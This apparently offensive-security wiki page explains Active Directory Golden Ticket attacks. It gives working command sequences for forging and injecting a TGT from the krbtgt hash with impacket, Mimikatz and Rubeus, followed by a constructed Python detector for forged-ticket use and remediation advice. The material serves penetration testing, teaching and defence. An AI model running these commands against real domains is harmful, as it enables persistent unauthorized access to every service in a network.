# Golden Tickets

A Golden Ticket is a forged Ticket Granting Ticket (TGT) built with the secret of the *krbtgt* domain account, the service account of the Key Distribution Center (KDC). Because the KDC accepts any TGT encrypted with that key, this forged TGT can be used to obtain a Service Ticket for any service on the network.

The password (more commonly the NT hash) of the *krbtgt* account is required to forge the TGT/Golden Ticket. It is often obtained through a [DCSync](https://stuff.weelee.zip/network/on-prem-active-directory/credential-hunting/ntds.dit/dcsync) attack once you have domain administrator privileges or equivalent.

{% hint style="info" %}
The Golden Ticket can be a means of persistence on the network since, by default, the password of the *krbtgt* account is never rotated; forged tickets remain valid until that password is reset twice.
{% endhint %}

## Exploit

{% tabs %}
{% tab title="impacket-ticketer" %}
{% embed url="https://github.com/fortra/impacket" %}

{% code title="Linux (Attacker)" %}

```fish
## Create a Golden Ticket Using the NT Hash of the krbtgt Account
ticketer.py -nthash [krbtgt nt hash] -domain-sid [domain sid] -domain [domain] krbtgt

## Set Obtained .ccache to Kerberos Credential Cache
export KRB5CCNAME=[path to .ccache]

## Use Your Exec Tool of Choice to Access Your Specific Service
psexec.py [domain]/krbtgt@[computer] -k -no-pass
```

{% endcode %}
{% endtab %}

{% tab title="Mimikatz" %}
{% embed url="https://github.com/gentilkiwi/mimikatz" %}

{% code title="Windows (Target)" %}

```powershell
## Run Mimikatz.exe
Mimikatz.exe

## Create Golden Ticket And Inject The Ticket Into The Current Process
kerberos::golden /domain:weelee.zip /sid:[domain sid] /rc4:[krbtgt nt hash] /user:weelee /ptt

## Use Your Exec Tool Of Choice To Access Whatever Service You Want
PSexec.exe -accepteula \\computer.weelee.zip cmd
```

{% endcode %}

{% hint style="info" %}
The `/rc4` flag can be replaced with `/aes128` or `/aes256` if the *krbtgt* key you hold is an AES key rather than the NT hash.
{% endhint %}
{% endtab %}

{% tab title="Rubeus" %}
{% embed url="https://github.com/GhostPack/Rubeus" %}

{% code title="Windows (Target)" %}

```powershell
## Create A Golden Ticket And Inject It Into The Current Process
Rubeus.exe golden /rc4:[krbtgt nt hash] /user:weelee /ldap /ptt

## Use Your Exec Tool Of Choice To Access Whatever Service You Want
PSexec.exe -accepteula \\computer.weelee.zip cmd
```

{% endcode %}

{% hint style="info" %}
The `/rc4` flag can be replaced with `/aes128` or `/aes256` if the *krbtgt* key you hold is an AES key rather than the NT hash.
{% endhint %}
{% endtab %}
{% endtabs %}
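From the defender's side, the tickets forged above leave a characteristic trace on the domain controllers: a service ticket request (event 4769) for an account that no DC ever issued a TGT to (no matching event 4768), often with RC4-HMAC encryption in a domain that otherwise uses AES, sometimes for an account name that does not exist, or in the name of *krbtgt* itself as in the impacket example. The script below is an added example written for this page, not code from impacket, Mimikatz or Rubeus; the event records, the account list and the field names it uses are constructed stand-ins for the Security-log fields `TargetUserName`, `IpAddress`, `TicketEncryptionType` and `ServiceName`.

```python
"""Heuristic detection of forged (Golden) TGT use from DC Security-log events.

Added illustrative example, not part of impacket, Mimikatz or Rubeus. It
correlates event 4768 (a DC issued a TGT) with event 4769 (a service ticket was
requested) and flags 4769 events that a forged TGT would produce: no DC ever
issued a TGT for that account, the ticket uses RC4-HMAC (0x17) although the
domain is AES-only, the account name is not in the directory, or the ticket is
in the name of krbtgt itself.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos encryption-type values as they appear in TicketEncryptionType.
RC4_HMAC = 0x17
AES256 = 0x12

# The default maximum TGT lifetime in Active Directory is 10 hours, so a
# service ticket request should follow a TGT issuance within that window.
LOOKBACK = timedelta(hours=10)

# Constructed stand-in for an AD account lookup (not real directory data).
KNOWN_ACCOUNTS = {"alice", "bob", "weelee", "krbtgt"}

# Constructed sample events (not real logs). Keys mirror the Security-log
# fields: TargetUserName, IpAddress, TicketEncryptionType, ServiceName.
EVENTS = [
    {"id": 4768, "time": "2024-05-01T08:00:00", "user": "alice", "ip": "10.0.0.5", "enc": AES256},
    {"id": 4769, "time": "2024-05-01T08:00:10", "user": "alice", "ip": "10.0.0.5", "enc": AES256, "service": "cifs/fs01"},
    # Service ticket in the name of a real user, but no DC ever issued it a TGT,
    # and the ticket is RC4: what a /rc4 golden ticket looks like on the DC.
    {"id": 4769, "time": "2024-05-01T09:15:00", "user": "weelee", "ip": "10.0.0.99", "enc": RC4_HMAC, "service": "cifs/computer"},
    # Same source, but the account name does not exist in the directory at all.
    {"id": 4769, "time": "2024-05-01T09:16:00", "user": "ghost", "ip": "10.0.0.99", "enc": RC4_HMAC, "service": "host/dc01"},
    # Ticket in the name of krbtgt, as the impacket example on this page produces.
    {"id": 4769, "time": "2024-05-01T09:17:00", "user": "krbtgt", "ip": "10.0.0.99", "enc": RC4_HMAC, "service": "cifs/fs01"},
]


def find_suspicious_tgs(events, known_accounts, lookback=LOOKBACK):
    """Return [(event, [reasons])] for 4769 events that look like forged-TGT use.

    Events from all DCs in the domain must be merged before calling this, since
    the 4768 for a legitimate user may have been logged on a different DC.
    """
    tgt_issued = defaultdict(list)  # user -> times at which a DC issued a TGT
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        user = ev["user"].lower()
        if ev["id"] == 4768:
            tgt_issued[user].append(t)
            continue
        if ev["id"] != 4769:
            continue
        reasons = []
        if not any(t - lookback <= issued <= t for issued in tgt_issued[user]):
            reasons.append("no 4768 TGT issuance for this account within the lookback window")
        if ev["enc"] == RC4_HMAC:
            reasons.append("service ticket uses RC4-HMAC (0x17) in an AES-only domain")
        if user not in known_accounts:
            reasons.append("account name does not exist in the directory")
        if user == "krbtgt":
            reasons.append("ticket is in the name of the krbtgt account itself")
        if reasons:
            findings.append((ev, reasons))
    return findings


if __name__ == "__main__":
    for ev, reasons in find_suspicious_tgs(EVENTS, KNOWN_ACCOUNTS):
        print(f"{ev['time']} {ev['user']}@{ev['ip']} -> {ev['service']}: " + "; ".join(reasons))
```

The RC4 check only catches tickets forged with `/rc4`; a ticket built from the *krbtgt* AES key passes it, so the missing-4768 correlation across all domain controllers is the more robust signal. Whatever the detection, the lasting fix is resetting the *krbtgt* password twice, with enough time between the resets for replication to complete.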
